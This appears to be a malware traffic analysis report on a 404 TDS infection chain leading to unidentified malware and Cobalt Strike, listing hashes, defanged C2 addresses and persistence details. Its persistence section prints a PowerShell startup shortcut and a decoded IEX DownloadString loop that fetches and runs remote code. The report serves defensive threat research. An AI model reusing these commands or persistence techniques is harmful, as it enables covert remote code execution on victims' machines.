2023-11-06 (MONDAY) - 404 TDS --> UNIDENTIFIED MALWARE --> COBALT STRIKE
NOTICE:
- Of note, the zip archives on this page have been updated, and they now use the new password scheme. For the new password, see the "about" page of this website.
ASSOCIATED FILES:
- 2023-11-06-IOCs-from-404TDS-to-malware-to-CobaltStrike.txt.zip 2.0 kB (2,007 bytes)
- 2023-11-06-404TDS-to-malware-to-Cobalt-Strike.pcap.zip 4.9 kB (4,865,381 bytes)
- 2023-11-06-404TDS-unidentified-malware-and-artifacts.zip 166 kB (167,417 bytes)
2023-11-06 (MONDAY) - 404 TDS --> UNIDENTIFIED MALWARE --> COBALT STRIKE NOTES: - Unidentified malware from 404 TDS distribution today. INFECTION CHAIN: - URL --> 404 TDS chain --> .js file --> initial C2 --> follow-up C2 --> Cobalt Strike ASSOCIATED MALWARE: - SHA256 hash: cf40754a3dc7d536b455086f349f9d7445bc4bcd01b6718bd800a80d6f9dca95 - File size: 2,439 bytes - File name: KPUW1359_2087960.js - File type: ASCII text, with very long lines (945) - File description: .js file downloaded from 404 TDS link - SHA256 hash: d09c7908c39e2a3255811722903d37df6bf7a2083958abff5ded2732f412047e - File size: 318,464 bytes - File location: hxxp[:]//170.130.165[.]37/RClient.dll - Saved location: C:\Users\Public\sdriver.dll - File type: PE32+ executable (DLL) (console) x86-64, for MS Windows - File description: 64-bit DLL for unidentified malware - Run method: unknown PERSISTENCE: - Description: Windows shortcut in Start Menu's Startup directory - Location: C:\Users\[username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk - Shortcut: %windir%\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -Exec -nop -enc (Get-ItemProperty -Path 'HKCU:\Software\Classes\msslnooo' -Name t).t REGISTRY UPDATE: - Key: HKEY_CURRENT_USER\SOFTWARE\Classes\msslnooo - Value 0 - Value Name: t - Value Type: REG_SZ - Value Data: [base64 string] - Decoded base64 string: while($true){IEX(New-Object Net.WebClient).DownloadString(" hxxp[:]//ftroftrodro[.]top:80/debug/fBTRdJs="); Start-Sleep -s 3600} - Note: No traffic seen to ftroftrodro[.]top, but it resolved to 170.130.165[.]37 when pinged OTHER ARTIFACTS: - SHA256 hash: 7e347a488aa085b1939d86488a6d204d0782604c9fad56731054da789b27edeb - File size: 467 bytes - File location: C:\Users\[username]\AppData\Local\Temp\w1.js - SHA256 hash: 746756065971e5168ecaeb5507aa6c449bbb88e90bb3537be4a470299a0679aa - File size: 289 bytes - File location: C:\Users\[username]\AppData\Local\Temp\w2.js INFECTION TRAFFIC: REDIRECT PATH TO INITIAL .JS FILE DOWNLOAD: - port 443 - hxxps[:]//truckjeepsuvparts[.]com/7b4/88ooy4cpn4j - port 443 - hxxps[:]//tradembs[.]com/wgaj4w - port 443 - hxxps[:]//medilabr[.]com/wnmwhg/ INITIAL C2: - 170.130.55[.]46 port 80 - 170.130.55[.]46 - POST / FOLLOW-UP C2: - 170.130.55[.]117 port 8080 - TLSv1.2 HTTPS traffic, self-signed certificate - 170.130.55[.]117 port 443 - TCP traffic, not encrypted, but with plain text and base64 strings FOLLOW-UP REMOTE ACCESS MALWARE: - 170.130.165[.]37 port 80 - 170.130.165[.]37 - GET /RClient.dll - 170.130.165[.]107 port 1444 - TCP traffic COBALT STRIKE: - 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /ah - 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /jquery-3.3.1.min.js - 170.130.55[.]150 port 80 - 170.130.55[.]150 - GET /jquery-3.3.1.slim.min.js - 170.130.55[.]150 port 80 - 170.130.55[.]150 - POST /jquery-3.3.2.min.js?__cfduid=[18 or 19 character base64 text] TRAFFIC FROM THE INFECTED HOST TO THE DOMAIN CONTROLLER: - [victim's internal IP address] port 5985 - [domain controller]:5985 - POST /wsman?PSVersion=5.1.19041.3570
Click here to return to the main page.